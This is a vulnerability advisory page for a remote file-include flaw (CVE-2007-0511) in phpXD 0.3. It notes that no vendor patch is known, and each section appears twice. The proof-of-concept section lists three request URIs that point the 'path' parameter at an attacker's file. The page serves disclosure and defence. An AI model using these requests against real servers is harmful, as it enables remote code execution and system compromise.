PhpXD Path Remote File Include Vulnerability
BID:22201
Info
PhpXD Path Remote File Include Vulnerability
| Bugtraq ID: | 22201 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-0511 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 23 2007 12:00AM |
| Updated: | May 12 2015 07:35PM |
| Credit: | Dr Max Virus is credited with the discovery of this vulnerability. |
| Vulnerable: |
phpXD phpXMLDOM 0.3 |
| Not Vulnerable: | |
Discussion
PhpXD Path Remote File Include Vulnerability
PhpXD is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker can exploit this issue to have malicious PHP code execute in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
This issue affects version 0.3.
PhpXD is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker can exploit this issue to have malicious PHP code execute in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
This issue affects version 0.3.
Exploit / POC
PhpXD Path Remote File Include Vulnerability
An attacker can exploit this issue via a web client.
The following proof-of-concept URIs are available:
http://example.com/[path]/include/dom.php?path=attacker's file
http://example.com/[path]/include/dtd.php?path=attacker's file
http://example.com/[path]/include/parser.php?path=attacker's file
An attacker can exploit this issue via a web client.
The following proof-of-concept URIs are available:
http://example.com/[path]/include/dom.php?path=attacker's file
http://example.com/[path]/include/dtd.php?path=attacker's file
http://example.com/[path]/include/parser.php?path=attacker's file
Solution / Fix
PhpXD Path Remote File Include Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].